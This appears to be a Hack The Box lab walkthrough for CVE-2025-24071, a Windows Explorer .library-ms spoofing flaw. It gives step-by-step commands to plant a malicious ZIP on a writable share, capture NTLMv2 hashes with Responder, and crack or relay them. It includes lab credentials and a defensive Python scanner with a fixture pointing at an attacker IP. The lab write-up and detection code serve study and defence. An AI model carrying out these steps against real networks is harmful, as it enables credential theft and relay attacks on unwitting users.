# CVE-2025-24071

### Proof of Concept for CVE-2025-24071: Windows File Explorer Spoofing Vulnerability

### Vulnerability

CVE-2025-24071

### Type

Windows File Explorer Spoofing via `.library-ms` files

### CVSS Score

7.8 (High)

### Description

CVE-2025-24071 is a spoofing vulnerability in Windows File Explorer that abuses the `.library-ms` file format. An attacker can craft such a file so that, when the user handles it, the victim's machine connects to a remote SMB server of the attacker's choosing, potentially leaking the user's NTLMv2 credentials.

### Environment Setup

* **Attacker (You):** Kali Linux on VPN, IP: `10.10.14.228`
* **Victim:** HTB Machine "Fluffy"
* **Domain:** `fluffy.htb`
* **Valid credentials:** Username: `j.fleischman`, Password: `J0elTHEM4n1990!`
* **Writable SMB share discovered:** `IT`

### Step 1: Enumerate SMB Shares

First, let's see what shared folders are available on the target and if we can write to any.

```bash
nxc smb 10.129.60.202 -u j.fleischman -p J0elTHEM4n1990! --shares
```

Expected output:

```text
SMB         10.129.60.202   445    DC01             Share           Permissions     Remark
SMB         10.129.60.202   445    DC01             -----           -----------     ------
SMB         10.129.60.202   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.60.202   445    DC01             C$                              Default share
SMB         10.129.60.202   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.60.202   445    DC01             IT              READ,WRITE      
SMB         10.129.60.202   445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.60.202   445    DC01             SYSVOL          READ            Logon server share
```

The `IT` share is what we’re interested in because it has both READ and WRITE permissions.

### Step 2: Build the Exploit File

Now we’ll use the public exploit script to generate a malicious `.library-ms` file wrapped in a ZIP.

```bash
python3 exploit.py -i 10.10.14.228 -f Reports
```

This command tells the script:

* `-i`: Your local IP address, i.e. the Kali machine's VPN interface (`tun0`) that the victim must be able to reach
* `-f`: The base name of the file to generate (e.g., `Reports`, producing `Reports.library-ms`)

After it runs, you’ll see a ZIP file called `exploit.zip`; this is what we’ll upload to the target.

### Step 3: Upload the Exploit

We now push our `exploit.zip` file to the writable SMB share (`IT`) like this:

```bash
smbclient //10.129.60.202/IT -U j.fleischman%J0elTHEM4n1990!
```

Then, within the `smbclient` prompt:

```bash
put exploit.zip
```

The share should now look like this:

```text
smb: \> ls
  .                                   D        0  Tue May 27 06:11:42 2025
  ..                                  D        0  Tue May 27 06:11:42 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 15:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 15:04:05 2025
  exploit.zip                         A      322  Tue May 27 06:11:42 2025
  KeePass-2.58                        D        0  Fri Apr 18 15:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 15:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 14:31:07 2025
```

### Step 4: Set Up Responder to Capture Hashes

Now, start Responder on your VPN interface to catch any incoming SMB authentication attempts:

```bash
sudo responder -I tun0 -v
```

Make sure the Responder window stays open; it will capture NTLMv2 hashes automatically when the victim opens the file.

### Step 5: Wait for the Victim to Open the File

Once someone opens `exploit.zip` and interacts with `Reports.library-ms`, their system will silently try to connect to your Kali box. Responder will then capture their NTLMv2 hash.

You’ll see output like:

```text
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:<challenge>:<NTLMv2 hash>:...  
```
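From the defender's side, the artefact that gives this attack away is the uploaded `.library-ms` file itself: its `<simpleLocation><url>` points at a UNC host that is not a legitimate file server. The following triage helper is an added example, not code from the linked exploit repository or the HTB machine; it unpacks a ZIP such as `exploit.zip`, parses every `.library-ms` member and flags locations outside an allowlist. The allowlist (`dc01`, `dc01.fluffy.htb`) and the embedded sample library file are constructed for this example.

```python
from __future__ import annotations
import io
import re
import zipfile
import xml.etree.ElementTree as ET

LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
TRUSTED_HOSTS = {"dc01", "dc01.fluffy.htb"}  # hypothetical allowlist of legitimate file servers

def library_urls(xml_bytes: bytes) -> list[str]:
    """Every <simpleLocation><url> value declared in a library-ms document."""
    root = ET.fromstring(xml_bytes)
    return [u.text.strip() for u in root.iter(f"{LIB_NS}url") if u.text]

def unc_host(url: str) -> str | None:
    """Host part of a UNC path such as \\\\host\\share; None for non-UNC locations."""
    m = re.match(r"^\\\\([^\\]+)", url.strip())
    return m.group(1).lower() if m else None

def suspicious_urls(xml_bytes: bytes, trusted=TRUSTED_HOSTS) -> list[str]:
    """Locations that would make Explorer authenticate to a host we do not trust."""
    return [u for u in library_urls(xml_bytes)
            if (h := unc_host(u)) is not None and h not in trusted]

def scan_zip(data: bytes, trusted=TRUSTED_HOSTS) -> dict[str, list[str]]:
    """Map each .library-ms member of a ZIP archive to its untrusted UNC targets."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".library-ms"):
                hits = suspicious_urls(zf.read(name), trusted)
                if hits:
                    findings[name] = hits
    return findings
# Constructed test fixture: a library whose only location is a UNC path to the
# walkthrough's attacker address, wrapped in a ZIP like the one uploaded to IT.
SAMPLE_LIBRARY = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\10.10.14.228\\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Reports.library-ms", SAMPLE_LIBRARY)
    return buf.getvalue()
```

Running `scan_zip` over a real archive pulled from the share returns the member names and the hosts they would authenticate to, which is the list worth blocking at the egress firewall and hunting for in SMB client logs.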

### What Can You Do With This Hash?

* You can crack it using `hashcat` or `john` to retrieve the plaintext password
* Or, relay it in real-time to escalate privileges in certain scenarios (e.g., with `ntlmrelayx`)

### Resources

* [GitHub Exploit](https://github.com/ThemeHackers/CVE-2025-24071)
* [MITRE CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24071)
* [HTB Machine](https://app.hackthebox.com/machines/Fluffy)
